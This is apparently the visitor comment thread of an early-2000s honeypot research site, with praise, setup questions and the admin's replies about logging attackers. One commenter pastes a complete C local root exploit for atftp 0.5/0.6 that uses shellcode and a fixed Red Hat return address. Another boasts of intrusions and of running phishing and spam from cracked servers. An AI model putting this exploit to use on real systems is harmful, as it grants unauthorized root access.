React

The react form has been deactivated. Old reactions can be found below.
Anonymous
Funny :)

 
Anonymous
Winnie ruled !

 
Anonymous
This way we can even chat

 
stonex
Nice work, koon ;)

 
Jacco
Magnificent :)

 
SecWiz
Are you still running any pots?

26 Jan 2003
www.secwiz.com


 
Admin
SecWiz: At the moment the box is running FreeBSD 4.7 for testing purposes, not as a honeypot. I don't know if I'll be running one anytime soon either..

However, back in November 2002 my RedHat-setup was cracked, but I didn't document that yet. Today (27th January 2003) I documented the crack a bit, so now you can read about it, it's honeypot 4.

 
Anonymous
can u please let me know how did u go about setting the honeypot up because i also want to do it

 
Admin
I will do some work on this site when I find time. That includes somewhat more info on how I set things up.

 
BooR
R0x tha planet !

 
Arithmetica
Cool site, serkie :)

 
Admin
Apparently I screwed something up with this react-form. It may have been months since this thing stopped working...

I fixed it now, though..

 
Anonymous
what method did you use to log all the ssh passwords....

thx, jd@labgeek.net

 
Admin
I simply hacked ssh (the client) to save passwords to a file, a well-known way to gather passwords.

Never used that backdoored ssh, though.


 
You_Wish
What method is given to hackers to hack the pc or what doors do you present to them. ie... do you give them root or ssh etc..

 
Anonymous
how did you know what exactly commands he typed?

 
Arnold
Can you make some tutorial how to set up honeypot home? please

 
Admin
I see there are quite some questions.. I will add a FAQ-section where I'll answer them soon...
 
Anonymous
Very nice of you...And reading the honeypots was really enjoying :)
But those kiddies were good at hacking, pretty good :)

 
Anonymous
When will you set up FAQ, about Setting Up honeyd

 
Anonymous
yes, when?

 
Admin
At the moment I'm quite busy with some other projects, but I'll get back to it ASAP. Anyway, there's some info under 'setup', already.

 
Doom
How are you doin..You hacked the "apache" ssh ...and that..so when ppl is hacking you, you see all what are they doin...

That is only what i need, and i need to set outgoing connection to 1kb/s so he cannot do something stupid.. :) But Hope You put some Tutorial how you did..


 
Anonymous
what happened?

 
acidstorm
get us a new irix rootkit!

 
Anonymous
waitin for the FAQ :D

 
Admin
Yeah, I really should be doing some work on this site. Bit busy with graduation, though..


 
PITYFUL Anonymous
all of you suck! COME ON COME HACK MY SYSTEM!

 
Admin
Now THAT was a smart remark, PITYFUL Anonymous.. You'd better spend your time learning stuff, for instance about security, than calling other people names..

About updating the site: I'll get to it pretty soon now, I hope. Been doing some work on my personal site; if that's done I'll get my hands dirty on this one :)



 
F4steddie
Hi, Greetings for the good job!
I'm really interested on the ssh hack.. hope to see the c0de soon =)

 
honeydrippin
excellent site n work !

 
Anonymous
Nice site.....i just wanna say it that your site it's very interesting...
keep up the good work ..and DO have a LOT OF FUN


 
lexxor
really good analyses i enjoyed your site.

 
MariusM
Three from those hackers were romanian :D Except the Italian one :D

 
Zwiebeltuete
This is the TV-way of honeypots. Just sit back, relax and let yourself be entertained by nicely presented attacks. Thank you.

It is also interesting to see the different ways unix and ms computers are hacked. ms seems to be more interesting for worms because of the huge installation base (something like "critical mass for a chain reaction" comes to mind) and unix computers seem to be more interesting for doing some real "work".

Mahlzeit



 
Osama
good work!

 
BuggiBUG
but you are HACKed :))

 
AllWanted
## Trying to identify hosts
# Done! completed in 120 seconds
#---------------------------------------------------------------
# AllWanted's wurm back door - part of original AllWanted's wurm.
# by AllWanted, root@AllWanted.Org
# starting backdoor on port 1111, pid = 29940
# >>> Game Over Al|Wanted Win <<<
# You Are in: xx.xxx.xx.xx
sh-2.05a$ w
4:48am up 748 days, 11:54, 0 users, load average: 0.38, 0.33, 0.34
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
sh-2.05a$
sh-2.05a$


 
AllWanted
####### Local Exploit By Al|Wanted tested on redhat 7.3 #######
/*
* atftp.0.5
* atftp.0.6 - local proof of concept exploit
* exploits an unchecked buffer in the "get file" option "-g"
*
* return addr tested on redhat 7.3 - 0xbffffbcc
* change for other systems - ./k3 <offset>
*
* Netric Security(RESOURCE MATERIAL)
* http://www.AllWanted.org
* written by Al|Wanted
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

#define EGG 1024
#define BUFLEN (356+9)
#define NOP 0x90
/* eSDee's execve /bin/sh shellcode */
char shellcode[] =
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx
"\x50" // push %eax
"\x53" // push %ebx
"\x8d\x0c\x24" // lea (%esp,1),%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80"; // int $0x80

int main(int argc, char **argv[])
{
unsigned long ret = 0xbffffbcc;
char buf[BUFLEN];
char egg[EGG];
int c;
char *ptr;
long *ptr2;
int i=0;

if(argc>1) {
ret = ret - atol(argv[1]);
}
memset(buf,NOP,sizeof(buf));
ptr=egg;
for (i=0; i<1024-strlen(shellcode)-1;i++)*(ptr++) = '\x90';
for (i=0; i<strlen(shellcode);i++)*(ptr++) = shellcode[i];
egg[1024-1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);

ptr2 = buf;
for(c = 0; c < sizeof(buf); c+=4)
*(ptr2++) = ret;

fprintf(stdout,"------------------------------------------------(www.netric.org)\n");
fprintf(stdout," local atftp-0.x proof of concept exploit\n");
fprintf(stdout,"(sacrine)-------------------------------------------------------\n\n");
fprintf(stdout,"return addr: 0x%x\n",ret);
fprintf(stdout,"buffer : %d\n\n",strlen(buf));

execl("atftp", "atftp","-g",buf, NULL);

return(0);

}

 
Anonymous(for now)
Hey...How did you monitor blackhat's activity?
Please contact me at wsergios@hotmail.com
(I will install a vulnerable red hat linux..and i want to install a 'honeypot')

 
Elemental...
Nice...

 
AllWanted
But You Are Hacked :o)))

 
Admin
AllWanted: what's up with posting exploits here? Not really useful imo..

Anonymous(for now): I monitored activity by having a hacked bash version, which logged all activity to file. See the 'setup' section for more info :)


 
Anonymous
Cool.

I am doing a paper on tracking hackers, I want to use some of your data under Hacks and I would like to talk to you.

Please e-mail me at majnam2002@hotmail.com

Thanks,

John

 
Anonymous
Ok now what are you going to do since you found some hackers on your system that aren't authorized to be there?

Did you contact their ISP? Got their name? Pressed charges? etc?

Illegal hacking activities would cease if everyone started reporting it. And if the authorities would pursue people.

I missed that critical FTP check box in IIS and had kids from France uploading/downloading music in just a couple of days. I found them by noticing the increased activity on the network.

 
Admin
Well, in most cases, pressing charges just doesn't work. It's -very- if not -extremely- hard to prove 'hacking' in a court of law. At least in The Netherlands it's almost impossible to get anyone convicted for 'cybercrime', and in some countries there aren't even laws against this type of criminal activity, so pressing charges there is even more useless.

With regards to honeypots, they are not intended to 'take on' crackers. Their primary focus is on research. In some cases I did try to get some background information on the attackers, but not to report them to their ISPs. In general, that doesn't work too well either. They may be shut off from the net for a while, but it doesn't stop them.

Conclusion: in general, it's best to secure yourself as much as possible. After intrusions have taken place, you can -try- to do something against the attacker(s), but don't expect too much..

 
Maple
Just passing through when i was looking for information on Honeypots and i found this site. I like how you explain what they (the kiddies) were doing and how you monitored their actions. I especially like the way you went and followed the trail back to their computers. It's Sept. 30 2004 and it looks like this hasn't been updated in a while but i was wondering how i would edit stuff like ssh and ftp to save the passwords of hackers? Anyway, good, informative work.

 
Anonymous
I don't even know how I got to this page, but it's fun

 
Anonymous
BUT YOU ARE HACKED ! :o)

 
Angelhappy
nice work guy .. but i put a question to you: what if any cracker or hacker types this command on your server "rm -fr * /" if he has 0 uid?

 
Angelhappy
on google you will find a lot of xploits which can crack or hack your server. there are a lot of kinds of xploit for any kind of linux version. you can install your honeypot on your server ... but someone who knows that thing maybe will crack your server and delete all of your things from it! and then what to do??? look at monitor and cry! :)

 
Angelhappy
let me tell you something... i am from romania, i hacked servers, i used to make eggdrop or psybnc for me or for others. let me tell you about how a hacker thinks:
1. first are hackers who hack for stupid psybnc or eggdrop or emech, these are the stupid ones
2. second there are hackers who are making money with your server, like .. they make sales on ebay or amazon... they put their script on /var/www/html .. or where the web server is installed. they put their scripts to fool the customers from ebay or amazon. After they put the scripts on your server they send e-mails ... like 10.000 e-mails per 20 minutes! from your server
3. there are hackers who like to hack .. they made a passion of this and they are maniacs on this!
And there is a lot to say to you but .. nevermind

 
Angelhappy
if you have some question i will ask you, send me an e-mail at angelhapy18@yahoo.com !

 
Admin
A cracker may indeed run a 'rm -rf /' on the system. If so, too bad: a reinstall is needed. It hasn't happened so far on my systems, but it is possible.

With regards to spam/mails from the honeypot: outgoing traffic was severely limited, so outgoing mail wouldn't get anywhere, at least not at high rates.

So, if you just stay in control and watch what's happening, there shouldn't be too many problems with running such a high-interactive honeypot..

 
Anonymous
dadadadadada

 
Angelhappy
:) true .. maybe you will stay to watch what is doing there .. but you don't know never what is doing :) so secure your server :)

 
Admin
Angelhappy: No, securing a honeypot is foolish, a honeypot is -meant- to be insecure, so crackers can be monitored. That's their purpose in life :)

Check out http://www.honeynet.org for more information :)

 
Angelhappy
i check that already .. but it's better to secure your server .. if all the admins will secure their servers no hacker can crack their server .. so we will have a few hackers .. how's that?

 
Angelhappy
i crack a lot of servers too .. specially *.edu servers .. i hacked a router from NASA .. but nothing to do on it .. only 2 commands .. help and exit :) .. the servers are secured .. but not enough .. i am tired to secure servers from the hackers.. i want to see how can this honeypot works !

 
Admin
Well, honeypots help in combatting crackers, since they let admins gain insight into what exploits crackers use, what they do after breaking in, etc. etc. So even an insecure system can actually help security.

 
Bebino
Sa Va Iau La Pola

 
Angelhappy
sa-i iau si eu dar ... ma cam interseaza cazul asta :)

 
Admin
Removed some (Romanian) swearing.

 
Al3x
Hi man, real nice what u did here. Two of the guys are romanian (Master and that Microbul dude), I know that, since I'm one too (and I might add that the hacker-culture is very popular in Romania). Coincidence that the IP that Master-On was using comes straight from my home town, in some Internet-Cafe (don't really know if it still exists) and that shared stuff on his comp...well, what could one expect...at that time he was prob running win98 so everyone was sharing and sharing...

Anyway, this is to be appreciated (the potting I mean :-) ). Keep it on!

 
Angelhappy
hmm Mr Admin.. can you send me an e-mail at angelhapy18@yahoo.com? i want to talk with you something can you do that? thank you

 
lam
need one PC :(

 
alika
LoooL

 
Anonymous
:)

 
Pici
Auf

 
Anonymous_ana
gd work! it will be better if u posted a detailed version on how u create the whole honeypot project. For ppl like myself who knows absolutely nothing about honeypot, bt i do want to implement one!

 
sammyb
It's very cool!

 
Anon
Interesting project

Good work

 
Anonymous
But you are hacked :P

 
Anonymous
can you explain how to install honeypot using linux red hat 9